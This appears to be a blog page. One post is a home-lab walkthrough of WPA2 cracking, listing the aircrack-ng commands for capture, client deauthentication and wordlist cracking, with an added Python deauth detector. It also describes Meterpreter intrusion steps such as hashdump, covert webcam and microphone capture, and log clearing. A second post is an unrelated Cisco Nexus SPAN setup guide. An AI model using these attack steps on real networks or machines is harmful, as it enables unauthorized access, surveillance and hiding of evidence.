
Security insight: Cracking WPA2 and fun with Meterpreter

So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff. So I got some time to play around 🙂 on my home lab. So here’s the thing:

It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password, post-handshake, and obviously it’s only as good as your word list.
Key commands are:

airmon-ng
airmon-ng start [wireless interface]
airodump-ng [monitor interface]
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
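
A defender's view of the deauthentication step (`aireplay-ng -0`) in the list above, as an added example that is not from the original post: a parser that picks deauth/disassoc frames out of radiotap-framed 802.11 captures and flags bursts aimed at one client. The MAC addresses, sample frames and the `window`/`threshold` values are constructed assumptions.

```python
import struct
DEAUTH, DISASSOC = 12, 10            # 802.11 management-frame subtypes

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(pkt):
    """Return (receiver, transmitter, bssid, reason) for a radiotap-framed
    deauth/disassoc frame, or None for anything else."""
    if len(pkt) < 4:
        return None
    rt_len = struct.unpack_from("<H", pkt, 2)[0]   # radiotap header length (LE)
    dot11 = pkt[rt_len:]
    if len(dot11) < 26:                            # 24-byte header + reason code
        return None
    ftype, subtype = (dot11[0] >> 2) & 0x3, dot11[0] >> 4
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    reason = struct.unpack_from("<H", dot11, 24)[0]
    return mac(dot11[4:10]), mac(dot11[10:16]), mac(dot11[16:22]), reason

def deauth_alerts(frames, window=1.0, threshold=10):
    """Flag (bssid, receiver) pairs hit by >= threshold frames within `window` s."""
    recent, alerts = {}, set()
    for ts, raw in frames:                         # frames: (timestamp, bytes), time-ordered
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        rx, _tx, bssid, _reason = parsed
        q = recent.setdefault((bssid, rx), [])
        q.append(ts)
        while ts - q[0] > window:                  # drop frames older than the window
            q.pop(0)
        if len(q) >= threshold:
            alerts.add((bssid, rx))
    return alerts

# Constructed sample capture (locally administered MACs, not real devices).
RADIOTAP = bytes.fromhex("0000080000000000")       # minimal 8-byte radiotap header
AP, STA, STA2 = (bytes.fromhex("02aabbccdd0" + d) for d in "123")

def frame(fc0, dst, src, bssid, body):
    return RADIOTAP + bytes([fc0, 0, 0, 0]) + dst + src + bssid + b"\x00\x00" + body

SAMPLE = [(10 + i * 0.005, frame(0xC0, STA, AP, AP, struct.pack("<H", 7))) for i in range(64)]
SAMPLE += [(10.5, frame(0x80, b"\xff" * 6, AP, AP, b"\x00" * 12)),      # beacon
           (100.0, frame(0xC0, STA2, AP, AP, struct.pack("<H", 3)))]   # lone deauth

if __name__ == "__main__":
    print(sorted(deauth_alerts(SAMPLE)))
```

Enabling 802.11w Protected Management Frames on the access point, where clients support it, makes clients ignore forged deauthentication frames.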

Further to that, and in about as much time as it took me to read up on Meterpreter (with recognition to Offensive Security), I was able to access a couple of Windows PCs on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and, probably the most impressive and most worrying, was able to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. :/ Oh… and I cleared the logs as I left the scene – all within a couple of hours.

So keep those systems secure and up to date peeps!

Creating a SPAN session on a Nexus 9K

Create SPAN session
=================================
9kswitch# conf t
9kswitch(config)# monitor session 1

Configure destination port (destination cannot be a FEX port or a Port-channel!)
=================================
9kswitch# conf t
9kswitch(config)# interface eth 1/15
9kswitch(config-if)# switchport monitor
9kswitch(config-if)# exit
9kswitch(config)# monitor session 1
9kswitch(config-monitor)# destination interface eth 1/15

Configure source port (or VLAN)
=================================
9kswitch(config-monitor)# source interface eth 1/10
9kswitch(config-monitor)# source interface eth 1/11
or
9kswitch(config-monitor)# source vlan x

Activate a SPAN session
==================================
9kswitch(config)# no monitor session 1 shut

Display SPAN session
==================================
9kswitch# show monitor
or
9kswitch# show monitor session 1

conf t
monitor session 1
exit
int eth 1/15
switchport monitor
exit
monitor session 1
destination int eth 1/15
source int eth 1/10
source int eth 1/11
exit
no monitor session 1 shut

Cisco Nexus 9000: Configuring SPAN